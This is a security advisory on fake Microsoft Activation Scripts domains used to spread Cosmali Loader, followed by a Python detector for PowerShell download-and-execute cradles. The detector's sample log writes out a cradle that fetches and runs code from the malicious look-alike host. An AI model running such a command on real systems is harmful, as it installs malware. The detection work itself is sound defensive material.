Warning: Fake Domains Impersonating MAS Used to Trick Users into Installing Cosmali Loader Malware


549/68 Friday, December 26, 2025

A cyberattack campaign has been detected that relies on typosquatting, in which attackers deliberately register look-alike domains containing misspellings to deceive users of Microsoft Activation Scripts (MAS), an open-source PowerShell script commonly used to activate Windows and Office. In this campaign, attackers registered the domain get.activate[.]win (missing the letter “d”) to impersonate the legitimate domain get.activated[.]win. If users fail to notice the typo and enter the misspelled command in PowerShell, their systems are immediately infected with malware known as Cosmali Loader.

Analysis shows that Cosmali Loader is capable of installing cryptocurrency mining software and deploying the XWorm Remote Access Trojan (RAT), allowing attackers to remotely take control of infected machines.

This activity was uncovered after multiple users reported receiving a pop-up warning stating: “You are infected with Cosmali Loader malware because you mistyped the domain name,” along with urgent instructions to reinstall Windows. Security experts believe this warning did not originate from the malware authors themselves, but rather from security researchers or well-intentioned third parties who gained access to the malware’s poorly secured command-and-control panel. They likely used this access to notify victims that their systems were compromised and that their data might already be exposed publicly.

The official MAS project maintainers have since confirmed the incident and issued a strong warning to users, urging them to carefully verify command spelling before pressing Enter. They recommend downloading the scripts directly from the project’s official GitHub repository to minimize risk. Experts further advise that anyone who may have executed commands from the fake domain should inspect Task Manager for suspicious PowerShell processes. However, the most reliable remediation is a full system wipe and Windows reinstallation to completely remove the malware.
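As an added example (not from the advisory or the MAS project), the check below scans PowerShell script-block log text for a download-and-execute cradle that fetches from a host within two edits of the legitimate get.activated[.]win, which catches the one-letter look-alike named above and other near-misses of it. The log lines are constructed, and the cradle pattern and the script-block log format are assumptions.

```python
import re
from typing import Iterable

# Legitimate MAS host named in the advisory; the look-alike differs by one missing letter.
LEGIT_HOST = "get.activated.win"

# Download-and-execute cradle: a web request piped straight into Invoke-Expression.
CRADLE_RE = re.compile(
    r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b.*\|\s*(iex|Invoke-Expression)\b", re.I)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance; a one-character typo scores 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_host(host: str) -> str:
    """'legit' for the real host, 'lookalike' within two edits of it, else 'other'."""
    host = host.lower().rstrip(".")
    if host == LEGIT_HOST:
        return "legit"
    if edit_distance(host, LEGIT_HOST) <= 2:
        return "lookalike"
    return "other"

def find_suspicious(lines: Iterable[str]) -> list[tuple[int, str]]:
    """Return (line_no, host) for cradle commands that fetch from a look-alike host."""
    hits = []
    for n, line in enumerate(lines, 1):
        if not CRADLE_RE.search(line):
            continue
        for host in HOST_RE.findall(line):
            if classify_host(host) == "lookalike":
                hits.append((n, host.lower()))
    return hits

# Constructed sample in the shape of PowerShell script-block log text; not real telemetry.
SAMPLE_LOG = [
    "ScriptBlockText: irm https://get.activated.win | iex",
    "ScriptBlockText: Get-Process | Where-Object CPU -gt 100",
    "ScriptBlockText: irm https://get.activate.win | iex",
    "ScriptBlockText: iwr https://example.test/tool.ps1 -OutFile tool.ps1",
]
```

Running `find_suspicious(SAMPLE_LOG)` flags only line 3, the cradle that pulls from the misspelled host; the genuine host and the non-executing download are left alone.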

Users are reminded that relying on unofficial system activation or modification tools always carries inherent security risks, and extreme caution should be exercised at all times.

Source: https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/